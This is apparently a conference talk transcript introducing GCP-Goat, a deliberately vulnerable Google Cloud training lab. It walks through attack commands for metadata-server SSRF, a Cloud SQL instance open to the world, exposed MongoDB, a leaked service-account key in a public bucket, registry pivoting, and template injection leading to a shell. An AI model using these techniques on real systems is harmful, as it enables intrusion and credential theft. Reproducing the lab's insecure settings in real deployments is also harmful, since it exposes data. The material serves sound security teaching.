So, hello everyone, today I am going to speak about understanding common cloud misconfigurations using GCP-Goat. Before going into the talk, a small introduction about me: I work as a security researcher at a company called we45. My primary areas of interest are cloud security, DevSecOps, and Kubernetes security. I regularly share my learnings via blogs and projects on my website, and this is my Twitter handle, so feel free to follow me or reach out if you want to discuss anything about security or just have a casual chat. The audience for this talk is red teamers who want to understand cloud security, blue teamers who want to know how to secure their GCP environments, and anyone interested in cloud security, especially GCP. The takeaway is that by the end of the talk you will be able to understand the common cloud misconfigurations in Google Cloud services. Before going to the actual slides, I just want to explain why I created GCP-Goat in the first place. When I started to learn GCP security years ago, there was no tool for me to learn it with.
There are similar tools for other cloud platforms: for AWS there is AWS Goat, for Kubernetes we have Kubernetes Goat, and for Terraform we have Terraform Goat. But there was no tool for me to learn GCP security; the only way back then was reading the documentation. Being the person who had to read all that documentation, I started to create this tool. The complete project can be found at the URL on the slide, where you can access the whole project. It is also under a free open-source license, so you can see the code, make changes, and add or pick anything, and most of the environments it creates fall under the free tier. In order to deploy GCP-Goat, you need a working Google Cloud account with billing enabled. If you don't have a Google Cloud account, you can sign up for the free tier, which gives you 300 dollars of credit for 90 days, three months, so we can make use of that.
To start, you have to create a new project: go to the Google Cloud console, select the project drop-down, and create a new project with any valid name you want. Once you have created it, go to the API dashboard and click on Enable Services. We want to enable three services: the Compute Engine API, the Kubernetes Engine API, and the Cloud SQL Admin API. The reason we enable these APIs is that whenever we want to access a service programmatically, its API has to be enabled. Once you have enabled the APIs, click the terminal icon and you will get Cloud Shell. Cloud Shell is nothing but a small VM; from it we can interact with the project and the other services inside Google Cloud. Before cloning the repo, make sure you are currently in the project you just created: since the application contains vulnerable code, we want to be sure you are not deploying it into a production environment or any other project. Also, after finishing the things we are going to do in this talk, cleanup is easier, so it is best to create a new project instead of reusing an existing one. The first step is cloning the repo, so let's see what the repo actually consists of. There are three folders present. The first folder is called infra.
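The setup steps above can also be done from Cloud Shell instead of the console; a minimal sketch, where the three API service names are my assumption of what the console's API library enables:

```shell
# Point Cloud Shell at the project you created (replace with your project ID)
gcloud config set project "$PROJECT_ID"

# Enable the three APIs the scenarios rely on
gcloud services enable \
  compute.googleapis.com \
  container.googleapis.com \
  sqladmin.googleapis.com
```

Enabling from the CLI is equivalent to clicking Enable Services in the dashboard; either way the services become callable programmatically.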
It contains all the infrastructure code for the applications deployed in GCP-Goat. The second folder is the docs folder, where the documentation resides. The third folder is scenarios, which holds the scripts necessary to create each scenario. Once you have cloned the repo in Cloud Shell (here I am showing my local environment), go into the scenarios folder; you will see around six scenarios there. Let's go through the scenarios one by one. Before attacking Compute Engine, I just want to explain what it is: Compute Engine is the service offered by Google Cloud to create and run VMs, so if you are coming from an AWS background, you can think of it as similar to EC2 instances. Every scenario folder has a create-scenario and a delete-scenario script, so let's see what the create script does. In the first step we get the project ID of the project we created earlier, and in the second step we point the current Cloud Shell at that project, to make sure all the resources we create are deployed into it. The next step creates a compute instance: a VM named test, with the machine type f1-micro, in an asia-east zone. I chose that zone because it is nearest to me, since I currently live in India; you can change the zone here. The base image I am using is cos-stable, which stands for Container-Optimized OS; I chose it because I am deploying my application as a Docker container. In the next step you will see something like metadata-from-file: this executes a script whenever the VM is created or restarted, and I will show that script after the other steps. The next step creates the firewall rules. Whenever we run services inside a VM, or in any compute service in GCP, it follows a deny-by-default principle: if you run something inside the compute instance, it cannot be accessed from the outside world. To access the service from outside, you have to create firewall rules, so I am creating a firewall rule to make sure port 80 is open. In the last step we get the external IP address of the VM we created and echo that the application can be accessed at that IP. As for the startup script, it just runs the Docker container: I create one variable for the application and execute the vulnerable application. From the screenshot you can see what it looks like: an internal down detector. You have probably heard of Down Detector, which checks the status of various web applications; companies also run internal down detectors to check whether all their services are running correctly and smoothly. Unfortunately, this tool, which was only supposed to be accessible internally, is exposed to the external world. In this application you can see there is a URL field in the header, and if you are familiar with web application security, you can probably guess what is wrong with this application.
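The create script described above can be sketched roughly like this; the instance name, zone suffix, startup-script filename, and firewall tag are illustrative assumptions, and the exact flags in GCP-Goat's script may differ:

```shell
PROJECT_ID=$(gcloud config get-value project)
gcloud config set project "$PROJECT_ID"

# f1-micro VM on Container-Optimized OS, running a startup script on boot
gcloud compute instances create test \
  --machine-type=f1-micro \
  --zone=asia-east1-b \
  --image-family=cos-stable \
  --image-project=cos-cloud \
  --metadata-from-file=startup-script=start.sh \
  --tags=http-server

# GCP denies inbound traffic by default, so port 80 must be opened explicitly
gcloud compute firewall-rules create allow-http \
  --allow=tcp:80 --target-tags=http-server

# Print the external IP where the application can be reached
gcloud compute instances describe test --zone=asia-east1-b \
  --format='get(networkInterfaces[0].accessConfigs[0].natIP)'
```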
If you have not guessed it, I will just tell you: it is suffering from SSRF. SSRF stands for server-side request forgery; basically, we are tricking the server into making a request to another domain on our behalf. I will show one picture and explain: this is how the SSRF takes place. As the user, you make a request to the server, and from the server a request is made to another server. The problem with this is that every compute instance we create has access to the metadata server. The metadata server is where Google Cloud stores all the metadata about the instance: when it was created, which image it is using, which project it belongs to; it may also contain sensitive information. To access the metadata server, two conditions have to be met. The first is that the request has to come from the VM itself; you cannot reach the metadata server from your local machine. The second is that you have to pass a special header; in older versions of Google Cloud compute instances this was not necessary, but in recent versions they have made this header mandatory. Once you have entered these two things into the URL field and clicked Check Status, you will get sensitive information back about all of this. I am not showing the output here because it contains sensitive information. So that is how we exploit the compute engine scenario. The scenario folder also contains a delete script, so let's see what the delete scenario consists of.
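The two conditions above can be seen in the raw request. From inside the VM (or via the SSRF), the standard GCP metadata query looks like this; endpoint and header are the documented GCP ones:

```shell
# Must be sent from the VM itself (condition 1);
# the Metadata-Flavor header satisfies condition 2
curl -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/?recursive=true"
```

In the SSRF scenario, the attacker pastes that metadata URL into the application's URL field and lets the vulnerable server add the request from inside the VM.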
In the delete scenario we again get the project ID, configure the current shell to use that project, delete the VM we created, and delete the firewall rules. Once you are done with a scenario, I advise you to delete it, because otherwise there is a chance that some malicious person will attack it and create damage to your account. The next scenario we are going to see is attacking a SQL instance. Cloud SQL is the service offered by Google to manage databases. One of the main reasons people opt for the cloud is that most databases are offered as a service: you don't need to worry about the underlying infrastructure and other things like whether the OS is updated or whether the database software is updated. So let's see what the script consists of. To start the scenario, go into the scenario-2 folder and look at the create script. In the first step, as usual, we get the project ID we created and configure the current shell to use it. This script expects you to pass a parameter: a SQL instance name, which can be any random name, the only condition being that it has to be at least six characters. The script checks whether a parameter was passed, and if not, it tells you to please pass one. The next step creates the SQL instance with the name you passed, using database version MySQL 5.7 and the f1-micro tier; I chose this tier because it is the smallest and works on the free tier. I am also setting the authorized networks. An authorized network is basically something similar to a firewall: by default the SQL database cannot be accessed by other services or other accounts, and to access the database you have to add an authorized network. But the problem, as you can see, is that I am putting in 0.0.0.0/0, which opens the database to the whole world. In the last step we get the IP address of the SQL instance. Next I run an nmap scan, and in the scan you can see that on port 3306 a MySQL server is running. Then I try to access the MySQL server, passing root as the user and the IP I got as the host, and in the next step you can see I have gotten a shell inside MySQL. Now, since the MySQL server may contain sensitive information, I could read it, or do the usual MySQL things like deleting tables or changing values inside tables. So this is how we perform the attack on the SQL instance. What I want to say is that even though it is a managed service, there are certain security things that need to be taken care of in order to secure the deployment. Once we are done with the scenario, we delete it: in the delete script we get the project ID, configure the current project, and delete the SQL instance. So that is how we attack the managed SQL instance.
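Scenario 2 above, both creation and attack, can be sketched like this; the instance name is a placeholder you pass in, and the 0.0.0.0/0 authorized network is the deliberate misconfiguration:

```shell
# Create a Cloud SQL instance that is reachable from anywhere (the flaw)
gcloud sql instances create "$INSTANCE_NAME" \
  --database-version=MYSQL_5_7 \
  --tier=db-f1-micro \
  --authorized-networks=0.0.0.0/0

# Grab its public IP
SQL_IP=$(gcloud sql instances describe "$INSTANCE_NAME" \
  --format='get(ipAddresses[0].ipAddress)')

# Attacker side: confirm MySQL is listening, then connect as root
nmap -p 3306 "$SQL_IP"
mysql -h "$SQL_IP" -u root
```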
In the next scenario I am going to show how we can attack the Kubernetes engine. Before going to the actual scenario, I just want to explain Kubernetes in general; I cannot explain Kubernetes fully within two or three minutes, so I will just give a short one-on-one introduction in about a minute. Before Kubernetes itself, we want to understand what problem Kubernetes really solves. Let's take an example: you are running a simple web application using a Docker container on a compute instance. Due to something going viral, your website gets huge traffic, and because of the heavy traffic the website becomes very slow and people cannot use it. So instead of one container, you try to deploy four containers, and in order to make sure there is no single point of failure, you deploy the containers on different VM instances in different regions, so people can access the site easily. But the problem with this is that you have to make sure all the containers are in sync with each other and all of them keep running; doing this task manually is difficult, inefficient, and undisciplined for a large product. So we have to use an orchestrator, and this is where Kubernetes comes into the picture: Kubernetes is the orchestrator we have for running containers. This is how the Kubernetes architecture looks: it has two parts, the control plane and the worker nodes. In the control plane there is the API server, through which we talk to the Kubernetes cluster. The next component is the scheduler, which takes care of deploying applications: it decides on which node an application has to be deployed. Then there is etcd, which you can think of as the brain of Kubernetes: it is simply a database which holds the information about all the Kubernetes deployments. The next one is the controller manager, whose duty is to make sure all the applications are in a running state. And there is an optional one called the cloud controller manager, which acts as a bridge between the cloud provider and the Kubernetes deployment, making sure all the necessary cloud resources are created. The second main part is the nodes, where the actual applications are deployed. On each node there are two components: kube-proxy, which helps the pods communicate with each other, and the kubelet, which talks to the API server. So that is the basic introduction to the Kubernetes architecture; now let's see what the script consists of. To start the scenario, move into the scenario-3 folder and look at the create script. First we get the project ID, as in every scenario, and point the current shell at it. Next we create the cluster, with an Ubuntu base image, in the same zone as before. In order to access the cluster we need some credentials, so we fetch the credentials, and we create the firewall rules needed to access the services inside the Kubernetes engine. In the last step we use the kubectl tool to deploy the application into the cluster. So let's see what the Mongo manifest consists of. In the first step we deploy the MongoDB database using something called a Deployment. You can think of a Deployment as an abstraction over the application, and I don't want to go deep
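The cluster-creation steps just described can be sketched like this; the cluster name, zone, image-type value, and manifest filename are my assumptions, not necessarily what GCP-Goat's script uses:

```shell
# Create a small GKE cluster with Ubuntu node images
gcloud container clusters create test-cluster \
  --zone=asia-east1-b \
  --image-type=UBUNTU_CONTAINERD

# Fetch credentials so kubectl can talk to the cluster's API server
gcloud container clusters get-credentials test-cluster --zone=asia-east1-b

# Deploy the MongoDB manifest shipped with the scenario
kubectl apply -f mongo.yaml
```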
into it here; you can check out the official Kubernetes documentation if you want to understand more about Deployments, but for now just think of a Deployment as the application. By default, whenever we deploy applications in Kubernetes they cannot talk to each other, so in order to talk to other applications and to the outside world we create something called a Service; you can think of a Service as the way an application talks to everything else. There are three common ways to expose an application to the outside world: the first is a LoadBalancer, the second is an Ingress, and the third is a NodePort. Here we are using the type NodePort, which is nothing but exposing the service on the worker nodes' own IPs; in this scenario we are using port 30303, which is why we created the firewall rule. Once you have deployed the scenario, execute the command that shows all the nodes that were created. When you hit a node on that port, you can see that MongoDB is running there, or, similar to the previous scenario, you can run an nmap scan and see that MongoDB is running. After that, you can use a Mongo client and try to access it, passing the node IP address you got from the previous step instead of the placeholder. You can see we get a shell inside the database, and from there we can see all the other information in the database. So this is how we can attack GKE. If you are interested in more about Kubernetes, I highly recommend you check out Kubernetes Goat by Madhu Akula.
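The attack side of the GKE scenario above can be sketched like this; `$NODE_IP` stands in for the worker-node external IP you read from the node listing:

```shell
# Find a worker node's external IP
kubectl get nodes -o wide

# Confirm MongoDB is exposed on the NodePort
nmap -p 30303 "$NODE_IP"

# Connect with the Mongo shell and enumerate the databases
mongo --host "$NODE_IP" --port 30303 --eval 'db.adminCommand("listDatabases")'
```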
The next thing I am going to explain is attacking Cloud Storage. As in other clouds, storage is a common attack surface in the Google Cloud environment. As many of you probably know, the common attack scenario is sensitive information being exposed in a bucket, and an attacker getting access to the bucket and reading that sensitive information. Let's see what the scenario consists of. To start the scenario, go to the scenario-4 folder and look at the create script. First we get the project ID and point the current shell at it. For this scenario you also have to pass a parameter to the script. We then create a bucket; to create it and interact with Google Cloud buckets I used the tool gsutil. One thing you want to keep in mind is that bucket names have to be unique across all of Google Cloud: for example, say there are two companies, company A and company B, and company A uses a bucket called test; company B cannot use that bucket name, even though they are in a different environment. In the next step we create something called a service account. I will explain more about service accounts in a later scenario; for now, you can think of a service account as something like another user account. To this account we assign the Storage Admin permission, which lets the user list buckets, read the contents of buckets, and change the contents of buckets. Next, since we cannot use a service account directly, we create a service account key, and then we copy that key into the bucket we created. The last thing we do is change the permission of the bucket to world-readable. After that, we get the bucket URL, and once you access it you can see there is a file called service-key.json; using wget to see what the contents are, you can see we are looking at the service account credentials. So this is how we can perform the attack on a Google Cloud bucket. Please make sure that after doing this scenario you delete the accounts and the scenario. In the next scenario we are going to see how we can do privilege escalation using the service account. One thing to make sure of before going into it: you have to have done the previous scenario first, because this scenario is based on it. I go into the scenario-5 folder and look at what it consists of. In this scenario I get the project ID, point the current shell at it, and after that I download a
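Scenario 4 above can be sketched like this; the service-account name is a placeholder of mine, and the `roles/storage.admin` grant plus the `allUsers` read permission are the two key misconfigurations:

```shell
PROJECT_ID=$(gcloud config get-value project)

# Bucket names are globally unique across all of Google Cloud
gsutil mb "gs://$BUCKET_NAME"

# Service account with the overly broad Storage Admin role
gcloud iam service-accounts create demo-sa
gcloud projects add-iam-policy-binding "$PROJECT_ID" \
  --member="serviceAccount:demo-sa@${PROJECT_ID}.iam.gserviceaccount.com" \
  --role="roles/storage.admin"

# A key file makes the service account usable; it then gets leaked into the bucket
gcloud iam service-accounts keys create service-key.json \
  --iam-account="demo-sa@${PROJECT_ID}.iam.gserviceaccount.com"
gsutil cp service-key.json "gs://$BUCKET_NAME/"

# The bucket is made world-readable, so anyone can fetch the key
gsutil iam ch allUsers:objectViewer "gs://$BUCKET_NAME"
wget "https://storage.googleapis.com/$BUCKET_NAME/service-key.json"
```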
Docker image, tag it with the project ID so that I can push it to the Docker registry, and then remove the local image. Now, from the previous scenario we have gotten the service account, right? Using that account we execute the next steps: basically, I switch to that service account instead of using my current account. If you remember, we gave it the Storage Admin permission, and by default, whenever we use Google Container Registry, all the container images are stored in a Google Cloud bucket. Since we have permission to read buckets, we look at what images are present there, and you can see there is an image called secret. In the next step we download that image, and then we get a shell inside the downloaded container. You can see there is a secret file present, and if you cat the secret file you can see a super-secret string. In a real-world scenario this could be sensitive information like AWS keys or other API keys. Once you are done with the scenario, make sure you switch back to your original account and perform the delete steps. The last scenario we are going to see is privilege escalation in the compute engine. I will quickly explain what the scenario is: I create one simple instance with an Ubuntu OS base image, create the firewall rules to make sure it can be accessed by the user, get the IP address, and in the last step create a simple bucket.
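Scenario 5 above, pivoting from the leaked key into the container registry, can be sketched like this; the image name `secret` is from the talk, while the bucket naming reflects how GCR backs each project's images with a bucket named `artifacts.<project>.appspot.com`:

```shell
# Authenticate as the leaked service account
gcloud auth activate-service-account --key-file=service-key.json

# GCR keeps image layers in a storage bucket, which storage.admin can read
gsutil ls "gs://artifacts.${PROJECT_ID}.appspot.com/"

# Let docker use gcloud credentials, then pull and inspect the image
gcloud auth configure-docker
docker pull "gcr.io/${PROJECT_ID}/secret"
docker run --rm -it --entrypoint /bin/sh "gcr.io/${PROJECT_ID}/secret"
# inside the container: cat the secret file to reveal the string
```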
The bucket is called credit-card. Once you have created everything, you have to get into the instance; I have added a step showing how to SSH in, and if you click the SSH button you will get a shell inside the VM. Next you run the script, which basically downloads a Python application and starts a Python server. If you hit the IP address on its own you will get a 404, but if you access the name parameter, using the IP address you got from the script output, you will see that passing joshua in the name parameter shows "allow joshua", and if you try a different value, for example gcp-goat, it will show gcp-goat back. If you are familiar with web application attack surfaces, you can probably guess it is suffering from template injection. Template injection is a security flaw where a template engine is used in an unsafe way, which leads to remote code execution. To exploit this scenario I am going to use a tool called tplmap; it is similar to sqlmap, and the only disadvantage of the tool is that it is deprecated and still a Python 2 tool. You pass it this command, substituting the IP address you got from the script, and you will get confirmation that the app is suffering from template injection. In the next step we get a shell inside the server, and if you perform a gsutil ls you can see all the buckets present in the project. The reason we can see them is that whenever we create a compute engine instance, it gets a default service account which does not follow the least-privilege principle.
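The exploitation step can be sketched like this; the server port is an assumption (I default to port 80 as opened by the firewall rule), and tplmap's `--os-shell` flag drops you into a command shell once the injection is confirmed:

```shell
# Confirm the template injection and get a shell (tplmap is Python 2 only)
python2 tplmap.py -u "http://$VM_IP/?name=joshua" --os-shell

# From the shell on the VM, the default service account is already attached:
gsutil ls   # lists the project's buckets, including the credit-card bucket
```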
Once you are done with all the scenarios, I recommend you delete the project to make sure there are no resources left running. Here is how you can contribute to the project: you can improve the documentation, add more scenarios to GCP-Goat, improve the applications used in the scenarios, and spread the word in the community. These are my handles where you can reach out to me. I want to thank the whole DEF CON crew for this opportunity and for creating the awesome virtual DEF CON Cloud Village, and I also want to give special thanks to Magno for helping me with the whole project and the talk.